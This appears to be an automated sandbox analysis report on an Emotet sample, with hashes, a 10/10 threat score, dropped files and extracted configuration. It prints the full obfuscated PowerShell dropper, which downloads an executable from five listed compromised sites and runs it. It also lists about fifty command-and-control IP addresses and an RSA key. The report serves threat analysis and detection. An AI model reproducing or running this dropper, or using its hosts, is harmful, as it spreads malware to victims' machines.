25eace8fcf797762361e56a88c938c30f99acb13c928b8f618f0d0a6f33fd60b

General
Target

25eace8fcf797762361e56a88c938c30f99acb13c928b8f618f0d0a6f33fd60b

Filesize

N/A

Completed

25-12-2019 01:03

Score
10 /10
MD5

N/A

SHA1

N/A

SHA256

25eace8fcf797762361e56a88c938c30f99acb13c928b8f618f0d0a6f33fd60b

Malware Config

Extracted

Language ps1
Source $Vhdrigpty='Grnrlvjgqwiel';$Qhymddtpu = '882';$Qyfrfaxpspy='Bnboragzlr';$Katqhsrg=$env:userprofile+'\'+$Qhymddtpu+'.exe';$Oajndrulr='Sztguxzwwkuo';$Fuzjdsgve=&('n'+'ew'+'-ob'+'ject') nET.WebCliENT;$Vxyzyvysfm='http://diwafashions.com/wp-admin/mqau6/*http://designers.hotcom-web.com/ubkskw29clek/qnpm1p/*http://dixartcontractors.com/cgi-bin/nnuv/*http://diaspotv.info/wordpress/G/*http://easyvisaoverseas.com/cgi-bin/v/'."sPl`IT"('*');$Puwqofghl='Nbpxdnud';foreach($Hdikcevbuczha in $Vxyzyvysfm){try{$Fuzjdsgve."dowNLoad`F`Ile"($Hdikcevbuczha, $Katqhsrg);$Pyumbmvbvt='Hnxyvcsn';If ((&('G'+'et-Ite'+'m') $Katqhsrg)."len`gTh" -ge 28411) {[Diagnostics.Process]::"sTa`RT"($Katqhsrg);$Ggwjysxz='Xavcdmslgpx';break;$Ubafrskfyb='Gfcxiyuamjn'}}catch{}}$Rpacexerubixn='Akzyyoxhp'
URLs
exe.dropper

http://diwafashions.com/wp-admin/mqau6/

exe.dropper

http://designers.hotcom-web.com/ubkskw29clek/qnpm1p/

exe.dropper

http://dixartcontractors.com/cgi-bin/nnuv/

exe.dropper

http://diaspotv.info/wordpress/G/

exe.dropper

http://easyvisaoverseas.com/cgi-bin/v/

Extracted

Family emotet
C2

24.181.125.62:80

98.156.206.153:80

173.21.26.90:80

108.61.99.179:8080

165.227.156.155:443

159.69.89.130:8080

167.99.105.223:7080

5.196.74.210:8080

200.7.243.108:443

183.102.238.69:465

64.147.15.138:80

85.152.174.56:80

59.148.227.190:80

62.75.187.192:8080

174.77.190.137:8080

87.106.139.101:8080

173.247.19.238:80

2.38.99.79:80

178.210.51.222:8080

209.141.54.221:8080

91.242.138.5:443

190.147.215.53:22

186.67.208.78:8080

107.170.24.125:8080

81.0.63.86:8080

100.14.117.137:80

190.220.19.82:443

76.164.99.46:80

190.189.224.117:443

110.143.57.109:80

47.156.70.145:80

206.189.112.148:8080

217.160.182.191:8080

47.149.28.234:80

2.237.76.249:80

45.51.40.140:80

128.65.154.183:443

138.59.177.106:443

78.24.219.147:8080

87.230.19.21:8080

200.114.167.85:80

149.202.153.252:8080

82.27.181.93:80

173.91.11.142:80

66.25.34.20:80

190.162.159.212:80

176.106.183.253:8080

139.130.241.252:443

46.105.131.87:80

73.11.153.178:8080

rsa_pubkey.plain
-----BEGIN PUBLIC KEY----- MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAKl4M80uy0jcxUiFIaJJyxgHVVnFtCq6 bi6f2xXPh/XUZNyN8UXDe5HzhTc4kwon9MBZffNwFOIc61QfV3K3YzEI/ktcyNqK LS67ONxsVep769QdiVQJXrIaFjMXKz6viwIDAQAB -----END PUBLIC KEY-----
Signatures

Filter: None

    Processes
    Network
    Replay Monitor
    00:00 00:00
    Downloads
    • C:\Users\Admin\882.exe

    • C:\Users\Admin\882.exe

    • C:\Users\Admin\882.exe

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438

    • memory/3848-8-0x00000000023C0000-0x00000000023D7000-memory.dmp

    • memory/4368-11-0x00000000020F0000-0x0000000002107000-memory.dmp

    • memory/4368-12-0x0000000000400000-0x00000000004AA000-memory.dmp

    • memory/4968-2-0x00000177E660B000-0x00000177E6614000-memory.dmp